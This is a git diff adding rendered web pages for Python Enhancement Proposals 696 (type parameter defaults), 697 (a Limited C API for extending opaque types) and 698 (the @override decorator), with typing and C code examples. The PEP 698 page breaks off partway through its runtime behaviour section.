+# or Ts = (int, str), T = float
+Foo[int, str, float]
+
+
+

With the Python 3.12 built-in generic syntax, this case should raise a SyntaxError.

+
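For illustration, a minimal sketch of the disallowed form under that syntax (the class name is hypothetical):
class Foo[*Ts, T = bool]: ...  # SyntaxError: a TypeVar with a default cannot immediately follow a TypeVarTuple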

However, it is allowed to have a ParamSpec with a default following a +TypeVarTuple with a default, as there can be no ambiguity between a type argument +for the ParamSpec and one for the TypeVarTuple.

+
Ts = TypeVarTuple("Ts")
+P = ParamSpec("P", default=[float, bool])
+
+class Foo(Generic[Ts, P]): ...  # Valid
+
+Foo[int, str]  # Ts = (int, str), P = [float, bool]
+Foo[int, str, [bytes]]  # Ts = (int, str), P = [bytes]
+
+
+
+
+

Subtyping

+

Type parameter defaults do not affect the subtyping rules for generic classes. +In particular, defaults can be ignored when considering whether a class is +compatible with a generic protocol.

+
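As a minimal sketch of what this means in practice (the Box, HasValue, and read names are hypothetical), a class whose type parameter has a default is judged against a protocol using only the substituted type arguments:
from typing import Generic, Protocol, TypeVar
+
+DefaultIntT = TypeVar("DefaultIntT", default=int)
+T = TypeVar("T")
+
+class Box(Generic[DefaultIntT]):
+    def __init__(self, value: DefaultIntT) -> None:
+        self.value = value
+
+class HasValue(Protocol[T]):
+    value: T
+
+def read(obj: HasValue[str]) -> str:
+    return obj.value
+
+read(Box("hello"))  # Valid: Box[str] is inferred and matches HasValue[str];
+                    # the declared default (int) plays no role in the check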
+
+

TypeVarTuples as Defaults

+

Using a TypeVarTuple as a default is not supported because:

+
    +
  • Scoping Rules does not allow usage of type parameters +from outer scopes.
  • +
  • Multiple TypeVarTuples cannot appear in the type +parameter list for a single object, as specified in +PEP 646.
  • +
+

These reasons leave no current valid location where a +TypeVarTuple could be used as the default of another TypeVarTuple.

+
+
+
+

Binding rules

+

Type parameter defaults should be bound by attribute access +(including call and subscript).

+
class Foo[T = int]:
+    def meth(self) -> Self:
+        return self
+
+reveal_type(Foo.meth)  # type is (self: Foo[int]) -> Foo[int]
+
+
+
+
+

Implementation

+

At runtime, this would involve the following changes to the typing +module.

+
    +
  • The classes TypeVar, ParamSpec, and TypeVarTuple should expose the type passed to default. This would be available as a __default__ attribute, which would be None if no argument is passed and NoneType if default=None (see the sketch after this list).
  • +
+
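A minimal sketch of the runtime behaviour described above, under this PEP's semantics (names are illustrative):
from typing import ParamSpec, TypeVar
+
+T = TypeVar("T", default=int)
+U = TypeVar("U")
+P = ParamSpec("P", default=[str, int])
+
+print(T.__default__)  # int
+print(U.__default__)  # None -- no default argument was passed
+print(P.__default__)  # [str, int]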

The following changes would be required to both GenericAlias classes (typing._GenericAlias and types.GenericAlias):

+
    +
  • logic to determine the defaults required for a subscription.
  • +
  • ideally, logic to determine if subscription (like +Generic[T, DefaultT]) would be valid.
  • +
+

The grammar for type parameter lists would need to be updated to +allow defaults; see below.

+

A reference implementation of the runtime changes can be found at +https://github.com/Gobot1234/cpython/tree/pep-696

+

A reference implementation of the type checker can be found at +https://github.com/Gobot1234/mypy/tree/TypeVar-defaults

+

Pyright currently supports this functionality.

+
+

Grammar changes

+

The syntax added in PEP 695 will be extended to introduce a way +to specify defaults for type parameters using the “=” operator inside +of the square brackets like so:

+
# TypeVars
+class Foo[T = str]: ...
+
+# ParamSpecs
+class Baz[**P = [int, str]]: ...
+
+# TypeVarTuples
+class Qux[*Ts = *tuple[int, bool]]: ...
+
+# TypeAliases
+type Foo[T, U = str] = Bar[T, U]
+type Baz[**P = [int, str]] = Spam[**P]
+type Qux[*Ts = *tuple[str]] = Ham[*Ts]
+type Rab[U, T = str] = Bar[T, U]
+
+
+

Similarly to the bound for a type parameter, +defaults should be lazily evaluated, with the same scoping rules to +avoid the unnecessary usage of quotes around them.

+

This functionality was included in the initial draft of PEP 695 but +was removed due to scope creep.

+

The following changes would be made to the grammar:

+
type_param:
+    | a=NAME b=[type_param_bound] d=[type_param_default]
+    | a=NAME c=[type_param_constraint] d=[type_param_default]
+    | '*' a=NAME d=[type_param_default]
+    | '**' a=NAME d=[type_param_default]
+
+type_param_default:
+    | '=' e=expression
+    | '=' e=starred_expression
+
+
+

The compiler would enforce that type parameters without defaults cannot +follow type parameters with defaults and that TypeVars with defaults +cannot immediately follow TypeVarTuples.

+
+
+
+

Rejected Alternatives

+
+

Allowing the Type Parameters Defaults to Be Passed to type.__new__’s **kwargs

+
T = TypeVar("T")
+
+@dataclass
+class Box(Generic[T], T=int):
+    value: T | None = None
+
+
+

While this is much easier to read and follows a similar rationale to the +TypeVar unary +syntax, it would not be +backwards compatible as T might already be passed to a +metaclass/superclass or support classes that don’t subclass Generic +at runtime.

+

Ideally, if PEP 637 wasn’t rejected, the following would be acceptable:

+
T = TypeVar("T")
+
+@dataclass
+class Box(Generic[T = int]):
+    value: T | None = None
+
+
+
+
+

Allowing Non-defaults to Follow Defaults

+
YieldT = TypeVar("YieldT", default=Any)
+SendT = TypeVar("SendT", default=Any)
+ReturnT = TypeVar("ReturnT")
+
+class Coroutine(Generic[YieldT, SendT, ReturnT]): ...
+
+Coroutine[int] == Coroutine[Any, Any, int]
+
+
+

Allowing non-defaults to follow defaults would alleviate the issue of returning types like Coroutine from functions where the most-used type argument is the last (the return type). However, allowing non-defaults to follow defaults is too confusing and potentially ambiguous, even if only the above two forms were valid. Changing the argument order now would also break a lot of codebases. This is also solvable in most cases using a TypeAlias:

+
Coro: TypeAlias = Coroutine[Any, Any, T]
+Coro[int] == Coroutine[Any, Any, int]
+
+
+
+
+

Having default Implicitly Be bound

+

In an earlier version of this PEP, the default was implicitly set to bound if no value was passed for default. While convenient, this could let a type parameter with no default follow a type parameter with a default. Consider:

+
T = TypeVar("T", bound=int)  # default is implicitly int
+U = TypeVar("U")
+
+class Foo(Generic[T, U]):
+    ...
+
+# would expand to
+
+T = TypeVar("T", bound=int, default=int)
+U = TypeVar("U")
+
+class Foo(Generic[T, U]):
+    ...
+
+
+

This would have also been a breaking change for a small number of cases +where the code relied on Any being the implicit default.

+
+
+

Allowing Type Parameters With Defaults To Be Used in Function Signatures

+

A previous version of this PEP allowed TypeVarLikes with defaults to be used in +function signatures. This was removed for the reasons described in +Function Defaults. Hopefully, this can be added in the future if +a way to get the runtime value of a type parameter is added.

+
+
+

Allowing Type Parameters from Outer Scopes in default

+

This was deemed too niche a feature to be worth the added complexity. +If any cases arise where this is needed, it can be added in a future PEP.

+
+
+
+

Acknowledgements

+

Thanks to the following people for their feedback on the PEP:

+

Eric Traut, Jelle Zijlstra, Joshua Butt, Danny Yamamoto, Kaylynn Morgan +and Jakub Kuczys

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0696.rst

+

Last modified: 2024-09-03 17:24:02 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0697/index.html b/pep-0697/index.html new file mode 100644 index 00000000000..a48c15dc383 --- /dev/null +++ b/pep-0697/index.html @@ -0,0 +1,661 @@ PEP 697 – Limited C API for Extending Opaque Types | peps.python.org
+
+

+
+
+

PEP 697 – Limited C API for Extending Opaque Types

+
+
Author:
+
Petr Viktorin <encukou at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
23-Aug-2022
+
Python-Version:
+
3.12
+
Post-History:
+
24-May-2022, +06-Oct-2022
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at PyType_Spec.basicsize, +PyObject_GetTypeData(), +Py_TPFLAGS_ITEMS_AT_END, +Py_RELATIVE_OFFSET, +PyObject_GetItemData().

+


+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

Add Limited C API +support for extending some types with opaque data +by allowing code to only deal with data specific to a particular (sub)class.

+

This mechanism is required to be usable with PyHeapTypeObject.

+

This PEP does not propose allowing the extension of non-dynamically sized variable-sized objects such as tuple or int, due to their different memory layout and the perceived lack of demand for doing so. This PEP leaves room to do so in the future via the same mechanism, if ever desired.

+
+
+

Motivation

+

The motivating problem this PEP solves is attaching C-level state +to custom types — i.e. metaclasses (subclasses of +type).

+

This is often needed in “wrappers” that expose another type +system (e.g. C++, Java, Rust) as Python classes. +These typically need to attach information about the “wrapped” non-Python +class to the Python type object.

+

This should be possible to do in the Limited API, so that the language wrappers +or code generators can be used to create Stable ABI extensions. +(See PEP 652 for the benefits of providing a stable ABI.)

+

Extending type is an instance of a more general problem: +extending a class while maintaining loose coupling – that is, +not depending on the memory layout used by the superclass. +(That’s a lot of jargon; see Rationale for a concrete example of extending +list.)

+
+
+

Rationale

+
+

Extending opaque types

+

In the Limited API, most structs are opaque: their size and memory layout +are not exposed, so they can be changed in new versions of CPython (or +alternate implementations of the C API).

+

This means that the usual subclassing pattern – making the struct +used for instances of the base type be the first element of the struct +used for instances of the derived type – does not work. +To illustrate with code, the example from the tutorial +extends PyListObject (list) +using the following struct:

+
typedef struct {
+    PyListObject list;
+    int state;
+} SubListObject;
+
+
+

This won’t compile in the Limited API, since PyListObject is opaque (to +allow changes as features and optimizations are implemented).

+

Instead, this PEP proposes using a struct with only the state needed +in the subclass, that is:

+
typedef struct {
+    int state;
+} SubListState;
+
+// (or just `typedef int SubListState;` in this case)
+
+
+

The subclass can now be completely decoupled from the memory layout (and size) +of the superclass.

+

This is possible today. To use such a struct:

+
    +
  • when creating the class, use PyListObject->tp_basicsize + sizeof(SubListState) +as PyType_Spec.basicsize;
  • +
  • when accessing the data, use PyListObject->tp_basicsize as the offset +into the instance (PyObject*).
  • +
+

However, this has disadvantages:

+
    +
  • The base’s basicsize may not be properly aligned, causing issues +on some architectures if not mitigated. (These issues can be particularly +nasty if alignment changes in a new release.)
  • +
  • PyTypeObject.tp_basicsize is not exposed in the Limited API, so extensions that support the Limited API need to use PyObject_GetAttrString(obj, "__basicsize__"). This is cumbersome, and unsafe in edge cases (the Python attribute can be overridden); see the Python-level sketch after this list.
  • +
  • Variable-size objects are not handled +(see Extending variable-size objects below).
  • +
+
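For orientation, a Python-level sketch of the quantity involved (the SubList name is hypothetical; a real Limited API extension would perform the equivalent lookup from C):
class SubList(list):
+    """Illustrative subclass; a C extension would attach C-level state instead."""
+
+print(list.__basicsize__)     # the base's tp_basicsize, as exposed to Python
+print(SubList.__basicsize__)  # at least as large as the base's basicsize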

To make this easy (and even best practice for projects that choose loose +coupling over maximum performance), this PEP proposes an API to:

+
    +
  1. During class creation, specify that SubListState +should be “appended” to PyListObject, without passing any additional +details about list. (The interpreter itself gets all necessary info, +like tp_basicsize, from the base).

    This will be specified by a negative PyType_Spec.basicsize: +-sizeof(SubListState).

    +
  2. +
  3. Given an instance, and the subclass PyTypeObject*, +get a pointer to the SubListState. +A new function, PyObject_GetTypeData, will be added for this.
  4. +
+

The base class is not limited to PyListObject, of course: it can be used to +extend any base class whose instance struct is opaque, unstable across +releases, or not exposed at all – including type +(PyHeapTypeObject) or third-party extensions +(for example, NumPy arrays [1]).

+

For cases where no additional state is needed, a zero basicsize will be +allowed: in that case, the base’s tp_basicsize will be inherited. +(This currently works, but lacks explicit documentation and tests.)

+

The tp_basicsize of the new class will be set to the computed total size, +so code that inspects classes will continue working as before.

+
+
+

Extending variable-size objects

+

Additional considerations are needed to subclass +variable-sized objects +while maintaining loose coupling: +the variable-sized data can collide with subclass data (SubListState in +the example above).

+

Currently, CPython doesn’t provide a way to prevent such collisions. So, the proposed mechanism of extending opaque classes (negative spec->basicsize) will fail by default when the base is variable-sized (that is, when base->tp_itemsize is nonzero).

+

We could stop there, but since the motivating type — PyHeapTypeObject — +is variable sized, we need a safe way to allow subclassing it. +A bit of background first:

+
+

Variable-size layouts

+

There are two main memory layouts for variable-sized objects.

+

In types such as int or tuple, the variable data is stored at a fixed +offset. +If subclasses need additional space, it must be added after any variable-sized +data:

+
PyTupleObject:
+┌───────────────────┬───┬───┬╌╌╌╌┐
+│ PyObject_VAR_HEAD │var. data   │
+└───────────────────┴───┴───┴╌╌╌╌┘
+
+tuple subclass:
+┌───────────────────┬───┬───┬╌╌╌╌┬─────────────┐
+│ PyObject_VAR_HEAD │var. data   │subclass data│
+└───────────────────┴───┴───┴╌╌╌╌┴─────────────┘
+
+
+

In other types, like PyHeapTypeObject, variable-sized data always lives at +the end of the instance’s memory area:

+
heap type:
+┌───────────────────┬──────────────┬───┬───┬╌╌╌╌┐
+│ PyObject_VAR_HEAD │Heap type data│var. data   │
+└───────────────────┴──────────────┴───┴───┴╌╌╌╌┘
+
+type subclass:
+┌───────────────────┬──────────────┬─────────────┬───┬───┬╌╌╌╌┐
+│ PyObject_VAR_HEAD │Heap type data│subclass data│var. data   │
+└───────────────────┴──────────────┴─────────────┴───┴───┴╌╌╌╌┘
+
+
+

The first layout enables fast access to the items array. +The second allows subclasses to ignore the variable-sized array (assuming +they use offsets from the start of the object to access their data).

+

Since this PEP focuses on PyHeapTypeObject, it proposes an API to allow +subclassing for the second variant. +Support for the first can be added later as an API-compatible change +(though your PEP author doubts it’d be worth the effort).

+
+
+

Extending classes with the PyHeapTypeObject-like layout

+

This PEP proposes a type flag, Py_TPFLAGS_ITEMS_AT_END, which will indicate +the PyHeapTypeObject-like layout. +This can be set in two ways:

+
    +
  • the superclass can set the flag, allowing subclass authors to not care about +the fact that itemsize is involved, or
  • +
  • the new subclass sets the flag, asserting that the author knows the +superclass is suitable (but perhaps hasn’t been updated to use the flag yet).
  • +
+

This flag will be necessary to extend a variable-sized type using negative +basicsize.

+

An alternative to a flag would be to require subclass authors to know that the +base uses a compatible layout (e.g. from documentation). +A past version of this PEP proposed a new +PyType_Slot for it. +This turned out to be hard to explain, and goes against the idea of decoupling +the subclass from the base layout.

+

The new flag will be used to allow safely extending variable-sized types: +creating a type with spec->basicsize < 0 and base->tp_itemsize > 0 +will require the flag.

+

Additionally, this PEP proposes a helper function to get the variable-sized +data of a given instance, if it uses the new Py_TPFLAGS_ITEMS_AT_END flag. +This hides the necessary pointer arithmetic behind an API +that can potentially be adapted to other layouts in the future (including, +potentially, a VM-managed layout).

+
+
+

Big picture

+

To make it easier to verify that all cases are covered, here’s a scary-looking +big-picture decision tree.

+
+

Note

+

The individual cases are easier to explain in isolation (see the +reference implementation for draft docs).

+
+
    +
  • spec->basicsize > 0: No change to the status quo. (The base +class layout is known.)
  • +
  • spec->basicsize == 0: (Inheriting the basicsize)
      +
    • base->tp_itemsize == 0: The item size is set to spec->itemsize. (No change to status quo.)
    • +
    • base->tp_itemsize > 0: (Extending a variable-size class)
        +
      • spec->itemsize == 0: The item size is inherited. +(No change to status quo.)
      • +
      • spec->itemsize > 0: The item size is set. (This is hard to use safely, +but it’s CPython’s current behavior.)
      • +
      +
    • +
    +
  • +
  • spec->basicsize < 0: (Extending the basicsize)
      +
    • base->tp_itemsize == 0: (Extending a fixed-size class)
        +
      • spec->itemsize == 0: The item size is set to 0.
      • +
      • spec->itemsize > 0: Fail. (We’d need to add an ob_size, which is +only possible for trivial types – and the trivial layout must be known.)
      • +
      +
    • +
    • base->tp_itemsize > 0: (Extending a variable-size class)
        +
      • spec->itemsize == 0: (Inheriting the itemsize)
          +
        • Py_TPFLAGS_ITEMS_AT_END used: itemsize is inherited.
        • +
        • Py_TPFLAGS_ITEMS_AT_END not used: Fail. (Possible conflict.)
        • +
        +
      • +
      • spec->itemsize > 0: Fail. (Changing/extending the item size can’t be +done safely.)
      • +
      +
    • +
    +
  • +
+

Setting spec->itemsize < 0 is always an error. This PEP does not propose any mechanism to extend tp_itemsize rather than just inherit it.

+
+
+
+

Relative member offsets

+

One more piece of the puzzle is PyMemberDef.offset. +Extensions that use a subclass-specific struct (SubListState above) +will get a way to specify “relative” offsets (offsets based from this +struct) rather than “absolute” ones (based off the PyObject struct).

+

One way to do it would be to automatically assume “relative” offsets +when creating a class using the new API. +However, this implicit assumption would be too surprising.

+

To be more explicit, this PEP proposes a new flag for “relative” offsets. +At least initially, this flag will serve only as a check against misuse +(and a hint for reviewers). +It must be present if used with the new API, and must not be used otherwise.

+
+
+
+

Specification

+

In the code blocks below, only function headers are part of the specification. Other code (the size/offset calculations) is a detail of the initial CPython implementation, and subject to change.

+
+

Relative basicsize

+

The basicsize member of PyType_Spec will be allowed to be zero or +negative. +In that case, its absolute value will specify how much extra storage space +instances of the new class require, in addition to the basicsize of the +base class. +That is, the basicsize of the resulting class will be:

+
type->tp_basicsize = _align(base->tp_basicsize) + _align(-spec->basicsize);
+
+
+

where _align rounds up to a multiple of alignof(max_align_t).

+

When spec->basicsize is zero, basicsize will be inherited +directly instead, i.e. set to base->tp_basicsize without aligning. +(This already works; explicit tests and documentation will be added.)

+

On an instance, the memory area specific to a subclass – that is, the “extra space” that the subclass reserves in addition to its base – will be available through a new function, PyObject_GetTypeData. In CPython, this function will be defined as:

+
void *
+PyObject_GetTypeData(PyObject *obj, PyTypeObject *cls) {
+    return (char *)obj + _align(cls->tp_base->tp_basicsize);
+}
+
+
+

Another function will be added to retrieve the size of this memory area:

+
Py_ssize_t
+PyType_GetTypeDataSize(PyTypeObject *cls) {
+    return cls->tp_basicsize - _align(cls->tp_base->tp_basicsize);
+}
+
+
+

The result may be higher than requested by -basicsize. It is safe to +use all of it (e.g. with memset).

+

The new *Get* functions come with an important caveat, which will be +pointed out in documentation: They may only be used for classes created using +negative PyType_Spec.basicsize. For other classes, their behavior is +undefined. +(Note that this allows the above code to assume cls->tp_base is not +NULL.)

+
+
+

Inheriting itemsize

+

When spec->itemsize is zero, tp_itemsize will be inherited +from the base. +(This already works; explicit tests and documentation will be added.)

+

A new type flag, Py_TPFLAGS_ITEMS_AT_END, will be added. +This flag can only be set on types with non-zero tp_itemsize. +It indicates that the variable-sized portion of an instance +is stored at the end of the instance’s memory.

+

The default metatype (PyType_Type) will set this flag.

+

A new function, PyObject_GetItemData, will be added to access the +memory reserved for variable-sized content of types with the new flag. +In CPython it will be defined as:

+
void *
+PyObject_GetItemData(PyObject *obj) {
+    if (!PyType_HasFeature(Py_TYPE(obj), Py_TPFLAGS_ITEMS_AT_END)) {
+        <fail with TypeError>
+    }
+    return (char *)obj + Py_TYPE(obj)->tp_basicsize;
+}
+
+
+

This function will initially not be added to the Limited API.

+

Extending a class with positive base->itemsize using +negative spec->basicsize will fail unless Py_TPFLAGS_ITEMS_AT_END +is set, either on the base or in spec->flags. +(See Extending variable-size objects for a full explanation.)

+

Extending a class with positive spec->itemsize using negative +spec->basicsize will fail.

+
+
+

Relative member offsets

+

In types defined using negative PyType_Spec.basicsize, the offsets of +members defined via Py_tp_members must be relative to the +extra subclass data, rather than the full PyObject struct. +This will be indicated by a new flag in PyMemberDef.flags: +Py_RELATIVE_OFFSET.

+

In the initial implementation, the new flag will be redundant. It only serves +to make the offset’s changed meaning clear, and to help avoid mistakes. +It will be an error to not use Py_RELATIVE_OFFSET with negative +basicsize, and it will be an error to use it in any other context +(i.e. direct or indirect calls to PyDescr_NewMember, PyMember_GetOne, +PyMember_SetOne).

+

CPython will adjust the offset and clear the Py_RELATIVE_OFFSET flag when +initializing a type. +This means that:

+
    +
  • the created type’s tp_members will not match the input +definition’s Py_tp_members slot, and
  • +
  • any code that reads tp_members will not need to handle the flag.
  • +
+
+
+
+

List of new API

+

The following new functions/values are proposed.

+

These will be added to the Limited API/Stable ABI:

+
    +
  • void * PyObject_GetTypeData(PyObject *obj, PyTypeObject *cls)
  • +
  • Py_ssize_t PyType_GetTypeDataSize(PyTypeObject *cls)
  • +
  • Py_TPFLAGS_ITEMS_AT_END flag for PyTypeObject.tp_flags
  • +
  • Py_RELATIVE_OFFSET flag for PyMemberDef.flags
  • +
+

These will be added to the public C API only:

+
    +
  • void *PyObject_GetItemData(PyObject *obj)
  • +
+
+
+

Backwards Compatibility

+

No backwards compatibility concerns are known.

+
+
+

Assumptions

+

The implementation assumes that an instance’s memory +between type->tp_base->tp_basicsize and type->tp_basicsize offsets +“belongs” to type (except variable-length types). +This is not documented explicitly, but CPython up to version 3.11 relied on it +when adding __dict__ to subclasses, so it should be safe.

+
+
+

Security Implications

+

None known.

+
+
+

Endorsements

+

The author of pybind11 originally requested solving the issue +(see point 2 in this list), +and has been verifying the implementation.

+

Florian from the HPy project said +that the API looks good in general. +(See below for a possible solution to +performance concerns.)

+
+
+

How to Teach This

+

The initial implementation will include reference documentation +and a What’s New entry, which should be enough for the target audience +– authors of C extension libraries.

+
+
+

Reference Implementation

+

A reference implementation is in the extend-opaque branch +in the encukou/cpython GitHub repo.

+
+
+

Possible Future Enhancements

+
+

Alignment & Performance

+

The proposed implementation may waste some space if instance structs +need smaller alignment than alignof(max_align_t). +Also, dealing with alignment makes the calculation slower than it could be +if we could rely on base->tp_basicsize being properly aligned for the +subtype.

+

In other words, the proposed implementation focuses on safety and ease of use, +and trades space and time for it. +If it turns out that this is a problem, the implementation can be adjusted +without breaking the API:

+
    +
  • The offset to the type-specific buffer can be stored, so +PyObject_GetTypeData effectively becomes +(char *)obj + cls->ht_typedataoffset, possibly speeding things up at +the cost of an extra pointer in the class.
  • +
  • Then, a new PyType_Slot can specify the desired alignment, to +reduce space requirements for instances.
  • +
+
+
+

Other layouts for variable-size types

+

A flag like Py_TPFLAGS_ITEMS_AT_END could be added to signal the +“tuple-like” layout described in Extending variable-size objects, +and all mechanisms this PEP proposes could be adapted to support it. +Other layouts could be added as well. +However, it seems there’d be very little practical benefit, +so it’s just a theoretical possibility.

+
+
+
+

Rejected Ideas

+

Instead of a negative spec->basicsize, a new PyType_Spec flag could have been added. The effect would be the same: for any existing code accessing these internals without up-to-date knowledge of the change, the meaning of the field value changes in this situation either way.

+
+
+

Footnotes

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0697.rst

+

Last modified: 2024-08-20 10:29:32 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0698/index.html b/pep-0698/index.html new file mode 100644 index 00000000000..26c1ec99932 --- /dev/null +++ b/pep-0698/index.html @@ -0,0 +1,612 @@ PEP 698 – Override Decorator for Static Typing | peps.python.org
+
+

+
+
+

PEP 698 – Override Decorator for Static Typing

+
+
Author:
+
Steven Troxler <steven.troxler at gmail.com>, +Joshua Xu <jxu425 at fb.com>, +Shannon Zhu <szhu at fb.com>
+
Sponsor:
+
Jelle Zijlstra <jelle.zijlstra at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
05-Sep-2022
+
Python-Version:
+
3.12
+
Post-History:
+
20-May-2022, +17-Aug-2022, +11-Oct-2022, +07-Nov-2022
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document: see @override and +@typing.override for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+


+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

Abstract

+

This PEP proposes adding an @override decorator to the Python type system. +This will allow type checkers to prevent a class of bugs that occur when a base +class changes methods that are inherited by derived classes.

+
+
+

Motivation

+

A primary purpose of type checkers is to flag when refactors or changes break +pre-existing semantic structures in the code, so users can identify and make +fixes across their project without doing a manual audit of their code.

+
+

Safe Refactoring

+

Python’s type system does not provide a way to identify call sites that need to +be changed to stay consistent when an overridden function API changes. This +makes refactoring and transforming code more dangerous.

+

Consider this simple inheritance structure:

+
class Parent:
+    def foo(self, x: int) -> int:
+        return x
+
+class Child(Parent):
+    def foo(self, x: int) -> int:
+        return x + 1
+
+def parent_callsite(parent: Parent) -> None:
+    parent.foo(1)
+
+def child_callsite(child: Child) -> None:
+    child.foo(1)
+
+
+

If the overridden method on the superclass is renamed or deleted, type checkers +will only alert us to update call sites that deal with the base type directly. +But the type checker can only see the new code, not the change we made, so it +has no way of knowing that we probably also needed to rename the same method on +child classes.

+

A type checker will happily accept this code, even though we are likely +introducing bugs:

+
class Parent:
+    # Rename this method
+    def new_foo(self, x: int) -> int:
+        return x
+
+class Child(Parent):
+    # This (unchanged) method used to override `foo` but is unrelated to `new_foo`
+    def foo(self, x: int) -> int:
+        return x + 1
+
+def parent_callsite(parent: Parent) -> None:
+    # If we pass a Child instance we’ll now run Parent.new_foo - likely a bug
+    parent.new_foo(1)
+
+def child_callsite(child: Child) -> None:
+    # We probably wanted to invoke new_foo here. Instead, we forked the method
+    child.foo(1)
+
+
+

This code will type check, but there are two potential sources of bugs:

+
    +
  • If we pass a Child instance to the parent_callsite function, it will invoke the implementation in Parent.new_foo rather than Child.foo. This is probably a bug - we presumably would not have written Child.foo in the first place if we didn’t need custom behavior.
  • +
  • Our system was likely relying on Child.foo behaving in a similar way to +Parent.foo. But unless we catch this early, we have now forked the +methods, and in future refactors it is likely no one will realize that major +changes to the behavior of new_foo likely require updating Child.foo as +well, which could lead to major bugs later.
  • +
+

The incorrectly-refactored code is type-safe, but is probably not what we +intended and could cause our system to behave incorrectly. The bug can be +difficult to track down because our new code likely does execute without +throwing exceptions. Tests are less likely to catch the problem, and silent +errors can take longer to track down in production.

+

We are aware of several production outages in multiple typed codebases caused by +such incorrect refactors. This is our primary motivation for adding an @override +decorator to the type system, which lets developers express the relationship +between Parent.foo and Child.foo so that type checkers can detect the problem.

+
+
+
+

Rationale

+
+

Subclass Implementations Become More Explicit

+

We believe that explicit overrides will make unfamiliar code easier to read than +implicit overrides. A developer reading the implementation of a subclass that +uses @override can immediately see which methods are overriding +functionality in some base class; without this decorator, the only way to +quickly find out is using a static analysis tool.

+
+
+

Precedent in Other Languages and Runtime Libraries

+
+

Static Override Checks in Other Languages

+

Many popular programming languages support override checks. For example:

+ +
+
+

Runtime Override Checks in Python

+

Today, there is an Overrides library +that provides decorators @overrides [sic] and @final and will enforce +them at runtime.

+

PEP 591 added a @final decorator with the same semantics as those in the Overrides library. But the override component of the runtime library is not supported statically at all, which has added some confusion around this mixed runtime/static support.

+

Providing support for @override in static checks would add value because:

+
    +
  • Bugs can be caught earlier, often in-editor.
  • +
  • Static checks come with no performance overhead, unlike runtime checks.
  • +
  • Bugs will be caught quickly even in rarely-used modules, whereas with runtime +checks these might go undetected for a time without automated tests of all +imports.
  • +
+
+
+
+

Disadvantages

+

Using @override will make code more verbose.

+
+
+
+

Specification

+

When type checkers encounter a method decorated with @typing.override, they should treat it as a type error unless that method is overriding a compatible method or attribute in some ancestor class.

+
from typing import override
+
+class Parent:
+    def foo(self) -> int:
+        return 1
+
+    def bar(self, x: str) -> str:
+        return x
+
+class Child(Parent):
+    @override
+    def foo(self) -> int:
+        return 2
+
+    @override
+    def baz(self) -> int:  # Type check error: no matching signature in ancestor
+        return 1
+
+
+

The @override decorator should be permitted anywhere a type checker +considers a method to be a valid override, which typically includes not only +normal methods but also @property, @staticmethod, and @classmethod.

+
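For example, a minimal sketch (the Parent and Child members here are hypothetical; note that @override sits below the descriptor-creating decorator, as discussed under Runtime Behavior below):
from typing import override
+
+class Parent:
+    @property
+    def ratio(self) -> float:
+        return 1.0
+
+    @classmethod
+    def build(cls) -> "Parent":
+        return cls()
+
+class Child(Parent):
+    @property
+    @override
+    def ratio(self) -> float:  # Valid: overrides the property on Parent
+        return 2.0
+
+    @classmethod
+    @override
+    def build(cls) -> "Child":  # Valid: overrides the classmethod on Parent
+        return cls()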
+

No New Rules for Override Compatibility

+

This PEP is exclusively concerned with the handling of the new @override decorator, +which specifies that the decorated method must override some attribute in +an ancestor class. This PEP does not propose any new rules regarding the type +signatures of such methods.

+
+
+
+

Strict Enforcement Per-Project

+

We believe that @override is most useful if checkers also allow developers +to opt into a strict mode where methods that override a parent class are +required to use the decorator. Strict enforcement should be opt-in for backward +compatibility.

+
+

Motivation

+

The primary reason for a strict mode that requires @override is that developers +can only trust that refactors are override-safe if they know that the @override +decorator is used throughout the project.

+

There is another class of bug related to overrides that we can only catch using a strict mode.

+

Consider the following code:

+
class Parent:
+    pass
+
+class Child(Parent):
+    def foo(self) -> int:
+        return 2
+
+
+

Imagine we refactor it as follows:

+
class Parent:
+    def foo(self) -> int:   # This method is new
+        return 1
+
+class Child(Parent):
+    def foo(self) -> int:  # This is now an override!
+        return 2
+
+def call_foo(parent: Parent) -> int:
+    return parent.foo()  # This could invoke Child.foo, which may be surprising.
+
+
+

The semantics of our code changed here, which could cause two problems:

+
    +
  • If the author of the code change did not know that Child.foo already +existed (which is very possible in a large codebase), they might be surprised +to see that call_foo does not always invoke Parent.foo.
  • +
  • If the codebase authors tried to manually apply @override everywhere when +writing overrides in subclasses, they are likely to miss the fact that +Child.foo needs it here.
  • +
+

At first glance this kind of change may seem unlikely, but it can actually +happen often if one or more subclasses have functionality that developers later +realize belongs in the base class.

+

With a strict mode, we will always alert developers when this occurs.

+
+
+

Precedent

+

Most of the typed, object-oriented programming languages we looked at have an +easy way to require explicit overrides throughout a project:

+
    +
  • C#, Kotlin, Scala, and Swift always require explicit overrides
  • +
  • TypeScript has a +–no-implicit-override +flag to force explicit overrides
  • +
  • In Hack and Java the type checker always treats overrides as opt-in, but +widely-used linters can warn if explicit overrides are missing.
  • +
+
+
+
+

Backward Compatibility

+

By default, the @override decorator will be opt-in. Codebases that do not +use it will type-check as before, without the additional type safety.

+
+
+

Runtime Behavior

+
+

Set __override__ = True when possible

+

At runtime, @typing.override will make a best-effort attempt to add an +attribute __override__ with value True to its argument. By “best-effort” +we mean that we will try adding the attribute, but if that fails (for example +because the input is a descriptor type with fixed slots) we will silently +return the argument as-is.

+

This is exactly what the @typing.final decorator does, and the motivation +is similar: it gives runtime libraries the ability to use @override. As a +concrete example, a runtime library could check __override__ in order +to automatically populate the __doc__ attribute of child class methods +using the parent method docstring.

+
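A minimal sketch of this best-effort marker in action:
from typing import override
+
+class Parent:
+    def foo(self) -> int:
+        return 1
+
+class Child(Parent):
+    @override
+    def foo(self) -> int:
+        return 2
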